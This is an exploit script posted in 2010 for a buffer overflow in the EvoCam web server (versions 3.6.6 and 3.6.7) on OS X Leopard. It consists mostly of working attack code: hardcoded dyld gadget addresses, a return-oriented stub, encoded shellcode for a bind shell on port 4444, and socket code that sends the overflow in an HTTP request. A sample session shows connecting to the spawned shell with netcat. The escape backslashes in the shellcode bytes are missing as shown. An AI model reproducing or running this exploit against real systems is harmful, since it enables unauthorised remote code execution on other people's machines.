evocam-overflow.txt
Posted on 02 June 2010
#!/usr/bin/python # Exploit Title: OS X EvoCam Web Server Buffer Overflow Exploit 3.6.6 and 3.6.7 # Date: 1st June 2010 # Author: d1dn0t ( didnot __A-T__ me.com ) # Software Link: http://www.pizza.org/evocam.dmg # Version: EvoCam 3.6.6 and 3.6.7 # Tested on: OS X 10.5.8 Intel import socket import sys import struct from optparse import OptionParser # OS X EvoCam Web Server Buffer Overflow Exploit 3.6.6 and 3.6.7 # Tested on Leopard 10.5.8 Intel # Paul Harrington didnot __A-T__ me.com # #$ ./evocam.py -H 192.168.1.28 -P 8080 -T 2 #EvoLogical EvoCam 3.6.6/7 on OS X 10.5.8 Intel HTTP Buffer Overflow Exploit #didnot __A-T__ me.com #Targeting EvoCam Version 3.6.7 #[+] Sending evil buffer... #[+] Done! #[*] Check your shell at 192.168.1.28:4444 #$ nc -v 192.168.1.28 4444 #Connection to 192.168.1.28 4444 port [tcp/krb524] succeeded! #uname -a #Darwin Leopard-VM.local 9.8.0 Darwin Kernel Version 9.8.0: Wed Jul 15 16:55:01 PDT 2009; root:xnu-1228.15.4~1/RELEASE_I386 i386 print "EvoLogical EvoCam 3.6.6/7 on OS X 10.5.8 Intel HTTP Buffer Overflow Exploit" print "didnot __A-T__ me.com" usage = "%prog -H TARGET_HOST -P TARGET_PORT -T Target " parser = OptionParser(usage=usage) parser.add_option("-H", "--target_host", type="string", action="store", dest="HOST", help="Destination Host") parser.add_option("-P", "--target_port", type="int", action="store", dest="PORT", help="Destination Port") parser.add_option("-T", "--target", type="string", action="store", dest="TARGET", help="Target Version [1=3.6.6 2=3.6.7]") (options, args) = parser.parse_args() HOST = options.HOST PORT = options.PORT if options.TARGET == "1" : print "Targeting EvoCam Version 3.6.6" BUFLEN=1560 elif options.TARGET == "2" : print "Targeting EvoCam Version 3.6.7" BUFLEN=1308 else: BUFLEN=0 if not (HOST and PORT and BUFLEN): parser.print_help() sys.exit() # Settings for Leopard 10.5.8 WRITEABLE = 0x8fe66448 SETJMP = 0x8fe1cf38 #$ nm /usr/lib/dyld | grep "setjmp" #8fe1cf38 t _setjmp STRDUP = 0x8fe210dc #$ nm /usr/lib/dyld | grep "strdup" #8fe210dc t _strdup JMPEAX = 0x8fe01041 #0x8fe01041 <__dyld__dyld_start+49>: jmp *%eax NOP="x90x90" buf = \n"xdbxd2x29xc9xb1x27xbfxb1xd5xb6xd3xd9x74x24" + \n"xf4x5ax83xeaxfcx31x7ax14x03x7axa5x37x43xe2" + \n"x05x2exfcx45xd5x11xadx17x65xf0x80x18x8ax71" + \n"x64x19x94x75x10xdfxc6x27x70x88xe6xc5x65x14" + \n"x6fx2axefxb4x3cxfbxa2x04xaaxcexc3x17x4dx83" + \n"x95x85x21x49xd7xaax33xd0xb5xf8xe5xbex89xe3" + \n"xc4xbfx98x4fx5fx78x6dxabxdcx6cx8fx08xb1x25" + \n"xc3x3ex6fx07x63x4cxccx14x9fxb2xa7xebx51x75" + \n"x17x5cxc2x25x27x67x2fx45xd7x08x93x6bxa2x21" + \n"x5cx31x81xb2x1fx4cx19xc7x08x80xd9x77x5fxcd" + \n"xf6x04xf7x79x27x89x6ex14xbexaex21xb8x93x60" + \n"x72x03xdex01x43xb4xb0x88x47x64x60xd8xd7xd5" + \n"x30xd9x1ax55x01x26xf4x06x21x6bx75xac" FRAG0 = "x90" + "x58" + "x61" + "xc3" FRAG1 = "x90" + "x58" + "x89xe0" + "x83xc0x0e" + "x89x44x24x08" + "xc3" # 0C is a bad character STUB = \nFRAG0 + \nstruct.pack('<III',SETJMP,WRITEABLE+32,WRITEABLE) + \nFRAG1 + \n'A'*20 +\nstruct.pack('<IIIII',SETJMP,WRITEABLE+24,WRITEABLE,STRDUP,JMPEAX) + \n'A'*4 BUFFER = "A"*BUFLEN + STUB + NOP + buf s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((HOST,PORT)) print '[+] Sending evil buffer...' s.send("GET " +BUFFER + " HTTP/1.0 ") print "[+] Done!" print "[*] Check your shell at %s:4444 " % HOST s.close()
